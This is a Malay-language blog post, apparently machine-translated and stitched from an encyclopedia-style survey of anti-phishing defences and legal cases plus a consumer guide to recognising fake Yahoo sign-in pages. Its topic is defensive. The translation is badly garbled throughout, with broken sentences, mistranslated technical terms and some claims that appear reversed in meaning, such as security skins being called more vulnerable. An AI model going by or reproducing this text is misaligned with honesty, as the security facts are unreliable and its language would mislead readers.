Sijil adalah nama yang diberikan untuk-nilai sijil yang rendah yang disampaikan pada kad kredit dan pengesahan email; kedua ini dengan mudah sesat oleh penipu. Oleh kerana itu, sebuah laman web bernilai tinggi boleh dengan mudah palsu dengan sijil yang sah yang disediakan oleh CA lain. Hal ini dapat kerana CA adalah di bahagian lain dunia, dan tidak familiar dengan halaman e-dagang bernilai tinggi, atau bisa juga bahawa rawatan tidak diambil sama sekali.Sebagai CA hanya dibebankan dengan melindungi para pelanggan sendiri, dan bukan pelanggan CA lain, cacat ini melekat dalam model.

Solusi untuk ini adalah bahawa pelayar harus menunjukkan, dan pengguna harus akrab dengan, nama kuasa. Ini menyajikan CA sebagai sebuah tanda, dan memungkinkan pengguna untuk mempelajari beberapa CA bahawa dia akan datang ke dalam kenalan dalam negara dan sektor-nya. Penggunaan tanda juga sangat penting untuk menyediakan CA dengan insentif untuk meningkatkan menyemak mereka, sebagai pengguna akan mempelajari tanda dan permintaan pemeriksaan yang baik untuk halaman bernilai tinggi.

Penyelesaian ini pertama kali mempraktikkan dalam IE7 versi awal, ketika memaparkan sijil EV . Pada layar itu, CA mengeluarkan dipaparkan. Ini merupakan kes yang terpencil, tetapi. Ada ketahanan terhadap CA dicap di krom, mengakibatkan fallback ke tahap yang paling mudah di atas: pelayar pengguna wewenang

kelemahan yang mendasar dalam model keselamatan dalam pencarian

Percubaan untuk meningkatkan keselamatan UI telah menghasilkan keuntungan, tetapi juga terkena cacat mendasar dalam model keselamatan. Penyebab yang mendasari kegagalan pengesahan SSL untuk dipekerjakan baik di browsing dalam banyak dan terjalin.

Keselamatan sebelum ancaman nyata. Aman browsing Oleh itu dimasukkan ke tempat sebelum ancaman itu, keselamatan paparan kalah dalam "perang real estate" dari awal, pelayar. Rancangan asal dari Netscape termasuk paparan terkemuka nama halaman dan nama CA, tapi ini dijatuhkan pada keluaran pertama. Pengguna sekarang sangat berpengalaman dalam tidak menyemak maklumat keselamatan sama sekali.

Klik-thru sindrom. Namun, peringatan untuk dikonfigurasikan halaman buruk terus, dan tidak turun-undian. Jika sijil mengalami error di dalamnya (domain nama tidak berpadanan, luput), maka biasanya akan melancarkan pelayar popup untuk memberi amaran kepada pengguna. Sebagai alasan itu umumnya sebuah misconfiguration kecil, pengguna belajar untuk memotong amaran, dan sekarang, pengguna terbiasa untuk melayan semua amaran dengan penghinaan yang sama, sehingga-thru sindrom Klik.

Sebagai contoh, Firefox 3 mempunyai klik proses 4 untuk menambah pengecualian, tetapi telah terbukti diabaikan oleh pengguna yang berpengalaman dalam kes nyata dari MITM. Bahkan saat ini, kerana sebahagian besar akan peringatan untuk misconfigurations tidak MITMs nyata, sukar untuk melihat klik-thru bagaimana sindrom akan pernah dielakkan.

Kurangnya minat. Faktor lain yang mendasari adalah kurangnya sokongan untuk virtual hosting. Penyebab khusus adalah kurangnya sokongan untuk Indikasi Nama Server di webservers TLS, dan kos dan ketidaknyamanan untuk mendapatkan sijil.

Hasilnya adalah bahawa penggunaan pengesahan terlalu langka untuk menjadi apa pun kecuali kes khas. Hal ini telah mengakibatkan kurangnya pengetahuan dan sumber daya dalam pengesahan dalam TLS, yang pada gilirannya bermakna bahawa usaha oleh penjual, pelayar anda meng-upgrade Uis keselamatan mereka telah lambat dan tak bersemangat.

Komunikasi lateral. Model keselamatan untuk pelayar dalam banyak peserta yang meliputi: pengguna, penjual, pelayar, pengembang, CA, auditor, penjual webserver, halaman e-dagang, regulator (contohnya, FDIC), dan standard keselamatan jawatankuasa. Ada kurangnya komunikasi antara kumpulan-kumpulan berbeza yang komited untuk model keselamatan.

Contohnya, walaupun pemahaman pengesahan kuat pada peringkat protokol jawatankuasa IETF, Mesej ini tidak mencapai kumpulan UI. penjual Webserver tidak memprioritaskan Nama Server Indikasi (TLS / SNI) memperbaiki, tidak melihatnya sebagai suatu memperbaiki keselamatan, tetapi bukan ciri baru. Dalam prakteknya, semua peserta melihat kepada orang lain sebagai sumber kegagalan menuju phishing, maka perbaikan tempatan tidak diprioritaskan.

Hal-hal sedikit meningkat dengan Forum CAB, sebagai kumpulan yang termasuk vendor browser, juruaudit dan CA. Tapi kumpulan tidak memulakan dengan cara terbuka, dan hasil dari kepentingan komersil menderita pemain pertama, serta kurangnya paritas antara peserta. Bahkan saat ini, forum CAB tidak terbuka, dan tidak melibatkan wakil dari CA kecil, akhir-pengguna, pemilik e-dagang, dan lain-lain.

Standard kesesakan. Vendor komited untuk standard, yang menghasilkan kesan outsourcing ketika datang ke keselamatan. Walaupun ada banyak dan baik percubaan dalam meningkatkan keselamatan UI, ini belum diadopsi kerana mereka tidak lalai, atau bertentangan dengan standard. model Ancaman dapat kembali mencari diri di sekitar sebulan; standard Keselamatan memakan masa sekitar 10 tahun untuk menyesuaikan.

CA Mulia model mekanisme. Kawalan dipekerjakan oleh para peniaga di atas pelayar CA belum dikemaskini secara substansial; model ancaman ini. kawalan dan proses high daripada CA adalah kurang sesuai untuk perlindungan pengguna dan pengalamatan aktual dan ancaman saat ini.
Proses Audit sangat memerlukan pembaharuan. Manual baru-baru ini didokumentasikan EV model ini secara lebih terperinci, dan mendirikan sebuah patokan yang baik, tetapi tidak menggalakkan perubahan yang mendasar perlu dilakukan.

memberi amaran kepada pengguna ke laman web palsu

Pendekatan lain yang popular untuk phishing berjuang adalah menjaga senarai laman phising dikenali dan untuk memeriksa website dengan senarai. IE7 pelayar Microsoft , Mozilla Firefox 2.0, Safari 3.2, dan Opera semuanya mengandungi jenis-phishing tindakan anti. Firefox 2 digunakan Google software anti-phishing. Opera 9.1 menggunakan hidup blacklist dari PhishTank dan GeoTrust , serta hidupWhitelist dari GeoTrust .

Beberapa implementasi dari pendekatan ini menghantar URL yang dikunjungi kepada perkhidmatan pusat untuk diperiksa, yang telah menyuarakan keprihatinan mengenai privasi. Menurut sebuah laporan pada akhir tahun 2006 Mozilla, Firefox 2 dijumpai lebih berkesan daripada Internet Explorer 7 di mengesan halaman penipuan dalam sebuah kajian oleh syarikat ujian perisian bebas.

Suatu pendekatan diperkenalkan pada pertengahan 2006 melibatkan beralih kepada perkhidmatan DNS khusus yang menapis dikenali phishing domain: ini akan bekerja dengan pelayar apapun, dan mirip pada prinsipnya untuk menggunakan host file untuk menyekat iklan web.

Untuk mengurangkan masalah halaman phising meniru halaman korban oleh embedding gambar (seperti logo), beberapa pemilik laman telah menukar gambar-gambar untuk menghantar mesej kepada pengunjung bahawa laman mungkin palsu. Gambar boleh dipindahkan ke nama fail baru dan asli diganti secara kekal, atau pelayan dapat mengesan bahawa gambar tidak diminta sebagai sebahagian daripada browsing biasa, dan bukannya menghantar gambar amaran


Memperbanyak Login


Bank of America 's [adalah salah satu dari beberapa yang meminta pengguna untuk memilih gambar peribadi, dan memaparkan gambar-pengguna yang dipilih dengan bentuk yang meminta password. Pengguna perkhidmatan online bank diperintahkan untuk memasukkan password hanya ketika mereka melihat gambar mereka yang dipilih.

Namun, kajian terkini menunjukkan beberapa pengguna menahan diri dari memasukkan password mereka ketika gambar tidak hadir. Selain itu, ciri ini (seperti bentuk-bentuk lain dari dua faktor pengesahan) rentan terhadap serangan lain, seperti yang diderita oleh bank Nordea Scandinavia pada akhir tahun 2005, dan Citibank pada tahun 2006.
Sebuah sistem yang sama, di mana sebuah "automatik yang dihasilkan Identity Cue" terdiri daripada sebuah kata berwarna di dalam kotak berwarna dipaparkan kepada setiap pengguna laman web, sedang digunakan di institusi kewangan lain.

Keselamatan kulit adalah teknik berkaitan yang melibatkan overlay gambar yang dipilih pengguna ke borang login sebagai isyarat bentuk visual yang sah. Berbeza dengan skim gambar website berasaskan Namun, gambar itu sendiri dibahagikan hanya antara pengguna dan pelayar, dan tidak antara pengguna dan laman web. Skema ini juga bergantung pada protokol pengesahan timbal balik, yang membuatnya lebih rentan terhadap serangan yang mempengaruhi skim pengesahan pengguna sahaja.

Menghilangkan phishing mail

penapis spam khusus boleh mengurangkan jumlah e-mel phishing yang mencapai petutur inbox mereka. Pendekatan ini mengandalkan mesin pembelajaran dan pemprosesan bahasa semulajadi pendekatan untuk mengklasifikasikan phishing e-mel.


Pemantauan dan takedown

Beberapa syarikat menawarkan bank dan organisasi lain kemungkinan menderita penipuan phishing perkhidmatan keliling-jam untuk memantau, menganalisis dan membantu mematikan laman web phising. Individu boleh menyumbang dengan melaporkan phishing untuk kedua relawan dan kelompok industri, seperti PhishTank. Individu juga boleh menyumbang dengan melaporkan phishing cuba telefon ke Telefon Phishing, Federal Trade Commission.

Protokol Gunakan butang Password perjanjian-otentik

Protokol-protokol ini membolehkan password lemah untuk memberikan keselamatan yang kuat bahkan dengan seorang lelaki di tengah. Kata laluan tidak pernah dihantar ke pelayan, juga tidak ada maklumat yang akan membolehkan pelayan bermusuhan untuk melakukan serangan brute force. Mereka secara berkesan membuat phising mustahil, tanpa perlu sijil PKI, amaran pengguna atau mekanisme lain.

Namun, pada Jan 2010 mereka tidak dilaksanakan dalam pelayar banyak digunakan, walaupun ini boleh berubah. Jika mereka banyak diterapkan dan digunakan mereka boleh merosakkan industri anti-phishing substansial.

Hukum tanggapan
Pada tarikh 26 Januari 2004, US Federal Trade Commission mengemukakan tuntutan pertama terhadap phisher disyaki. Terdakwa, seorang remaja California, dipercayai mencipta sebuah laman web yang direka supaya kelihatan seperti di laman America Online, dan menggunakannya untuk mencuri maklumat kad kredit.

Negara-negara lain telah diikuti ini memimpin dengan menelusuri dan menangkap phisher. Seorang gembong phishing, Valdir Paulo de Almeida, ditangkap di Brazil untuk memimpin salah satu cincin yang terbesar kejahatan phishing, yang dalam dua tahun mencuri antara AS $ 18 juta dan US $ 37 juta.

Inggeris kuasa dipenjara dua orang pada Jun 2005 untuk peranan mereka dalam sebuah penipuan phishing, dalam kes berhubung ke US Secret Service Operasi Firewall, yang disasarkan terkenal "carder" website. Pada tahun 2006 lapan orang ditangkap oleh polis Jepun kerana disyaki phishing palsu penipuan dengan membuat laman web Yahoo Jepun, jaring sendiri ¥ 100,000,000 (US $ 870.000). Penangkapan berterusan di 2006 dengan FBI Operasi Cardkeeper menahan sekumpulan enam belas di Amerika Syarikat dan Eropah.

Di Amerika Syarikat, Senator Patrick Leahy memperkenalkan undang-undang Anti-Phishing tahun 2005 di Kongres pada tarikh 1 Mac 2005. RUU ini, jika telah ditetapkan menjadi undang-undang, akan dikenakan penjahat yang mencipta laman web palsu dan menghantar e-mel palsu untuk menipu pelanggan untuk denda sampai US $ 250.000 dan penjara sehingga lima tahun. Inggeris menguatkan arsenal undang-undang terhadap phishing dengan undang-undang, Penipuan 2006 yang memperkenalkan suatu pelanggaran umum penipuan yang boleh membawa sampai hukuman penjara sepuluh tahun, dan melarang pembangunan atau pemilikan phishing kit dengan maksud untuk melakukan penipuan.

Syarikat juga telah bergabung dengan usaha untuk menindak phishing. Pada tarikh 31 Mac 2005, Microsoft mengajukan tuntutan undang-undang persekutuan 117 di Mahkamah Daerah AS untuk Daerah Barat Washington. Tuntutan menuduh "John Doe" terdakwa untuk mendapatkan password dan maklumat rahsia. Mac 2005 juga melihat satu kerjasama antara Microsoft dan kerajaan Australia pegawai penguatkuasa undang-undang pengajaran cara untuk memerangi pelbagai kejahatan cyber, termasuk phishing.

Microsoft mengumumkan lebih banyak direncanakan 100 tuntutan undang-undang di luar AS pada Mac 2006, diikuti dengan dimulainya itu, pada bulan November 2006, sejumlah 129 tuntutan undang-undang pencampuran tindakan jenayah dan sivil. AOL diperkuatkan usaha melawan phishing di awal tahun 2006 dengan tiga tuntutan undang-undang mencari total US $ 18 juta di bawah tahun 2005 pindaan kepada Virginia Computer Crimes Act, dan Earthlink telah menyertai dalam dengan membantu untuk mengenalpasti enam lelaki kemudian diisi dengan phishing penipuan di Connecticut.

Pada bulan Januari 2007, Jeffrey Brett Goodin California menjadi terdakwa pertama yang dijatuhkan hukuman oleh dewan juri di bawah peruntukan undang-undang CAN-SPAM tahun 2003. Dia dijumpai bersalah menghantar ribuan e-mel kepada pengguna America Online, sedangkan menyamar sebagai jabatan penagihan AOL, yang mendorong pelanggan untuk menghantar maklumat peribadi dan kad kredit. Menghadapi kemungkinan 101 tahun penjara untuk pelanggaran CAN-SPAM dan jumlah sepuluh lain termasuk penipuan kawat, penyalahgunaan kad kredit, dan penyalahgunaan tanda dagang AOL, ia dijatuhi hukuman untuk melayani 70 bulan. Goodin telah ditahan sejak gagal tampil untuk sidang dahulu.

Bagaimana cara mengenalpasti laman web phising?

Jika anda menerima e-mel (atau mesej segera) dari seseorang yang anda tidak tahu mengarahkan anda untuk masuk ke sebuah laman web, hati-hati! Anda mungkin telah menerima email phishing dengan link ke laman web phising. Sebuah laman web phising (kadang-kadang disebut "palsu" halaman) cuba untuk mencuri password akaun anda atau maklumat sulit lain dengan pembodohan anda menjadi percaya anda pada laman web yang sah. Anda bahkan bisa mendarat di halaman phising oleh mistyping URL (alamat web).

Apakah laman web yang sah? Jangan tertipu oleh sebuah laman web yang tampak nyata.Sangat mudah untuk phisher untuk membuat laman web yang kelihatan seperti rencana asal, lengkap dengan logo dan grafik lain dari laman web yang dipercayai.

Penting: Jika anda sama sekali tidak yakin tentang laman web, jangansign in Hal selamat untuk dilakukan adalah menutup dan kemudian buka kembali, pelayar anda, dan kemudian taip URL ke Alamat's Bar, pelayar anda. Menaip URL yang benar adalah cara terbaik untuk memastikan anda tidak diarahkan ke laman web palsu.

Phisher semakin canggih dalam merancang laman web mereka palsu. Tidak ada cara yang pasti untuk mengetahui sama ada anda berada di halaman phising, tapi pada sini adalah beberapa penggunaan yang boleh membantu anda membedakan tapak web yang nyata dari sebuah laman phishing.

Semak alamat web

Hanya kerana alamat tersebut terlihat OK, jangan menganggap anda berada di halaman yang sah. Lihat di bar alamat pelayar anda untuk tanda-tanda bahawa anda mungkin di halaman phising:

• Salah nama syarikat. Sering kali alamat web daripada laman phishing kelihatan benar, tetapi sebenarnya mengandungi kesalahan ejaan yang umum dari nama syarikat atau aksara atau simbol sebelum atau selepas nama syarikat. Carilah helah seperti menukar nombor "1" untuk huruf "l" dalam sebuah alamat web (contohnya, www.paypa1.com bukan www.paypal.com).
• http:// pada awal alamat pada Yahoo! halaman login. Semak alamat laman web untuk segala kandungan Yahoo! halaman login. Sebuah sah Yahoo! Sign-in alamat laman bermula dengan "https ://." Carilah huruf "s" berikut "http."
• Hilang slash halaman. Untuk mengesahkan bahawa anda berada di sah Yahoo!, Pastikan garis miring ("/") dipaparkan selepas "yahoo.com" di bar Alamat - seperti contoh ini:





Sebuah garis miring ("/") selepas "yahoo.com" boleh membantu mengenalpasti Yahoo! Tapak.


Contohnya, "http://www.yahoo.com:login&mode=secure" adalah alamat laman web palsu.

Penting: Sebuah Yahoo sah? Laman login tidak pernah bermula dengan "http://geocities.yahoo.com." Jika anda tanah pada halaman GeoCities dengan Yahoo? sign-in tempat, laporkan sebagai laman web phishing akan.
menjadi pop-up yang mencurigakan.

Berhati-hatilah jika anda menghantar ke laman web yang memaparkan pertama tetingkap pop-up yang meminta anda untuk memasukkan nama pengguna dan password anda.penipuan Phishing mungkin mengarahkan anda ke laman web yang sah, tapi kemudian menggunakan pop-up untuk mendapatkan maklumat akaun anda.

Berikan password palsu
Jika anda tidak pasti jika sebuah halaman adalah otentik, jangan gunakan password yang sebenarnya anda untuk sign in Jika anda memasukkan password palsu dan tampaknya masuk, anda kemungkinan besar di halaman phising. Jangan memasukkan maklumat lebih lanjut; menutup pelayar anda. Ingat, walaupun, bahawa beberapa halaman phising secara automatik memaparkan mesej ralat tanpa password yang anda masukkan. Jadi, hanya kerana palsu kata laluan anda ditolak, jangan menganggap halaman tersebut sah.

Lihat anda sign in seal apabila anda sign in ke Yahoo!
A sign-in seal adalah sebuah mesej rahsia atau gambar yang anda pilih untuk memaparkan dalam Yahoo! Sign-in tempat untuk membantu melindungi akaun anda dari phisher. Karena sign-in seal adalah rahsia antara komputer anda dan Yahoo!, Anda boleh yakin anda pada Yahoo sah setiap halaman dengan menggunakan masa yang komputer sign in ke Yahoo!. Hanya mencari teks atau gambar tersuai anda tetapkan. Jika tidak ada, anda mungkin telah mendarat di halaman phising. Menciptakan sign-in seal pantas dan mudah.

laman web lain, seperti yang anda bank dan institusi kewangan lain, boleh menawarkan ciri-ciri yang sama untuk membantu melindungi anda terhadap penipuan phishing.

Gunakan web browser dengan pengesanan anti-phishing
Baik Internet Explorer dan Mozilla Firefox pelayar Web telah tidak Pengaya (atau "plug-in") yang boleh membantu anda mengesan laman phishing.

Berhati-hatilah dengan kaedah lain untuk mengenalpasti laman web yang sah
Beberapa kaedah yang digunakan untuk menunjukkan sebuah laman web yang dalam tidak selalu boleh dipercayai. Sebuah kunci terputus kecil atau gembok terkunci di bahagian bawah pelayar anda bukan merupakan penunjuk yang handal dari sebuah laman web yang sah. Hanya kerana ada kunci atau kunci dan sijil keselamatan kelihatan otentik, jangan menganggap halaman tersebut sah.

0 comments:

Related Posts with Thumbnails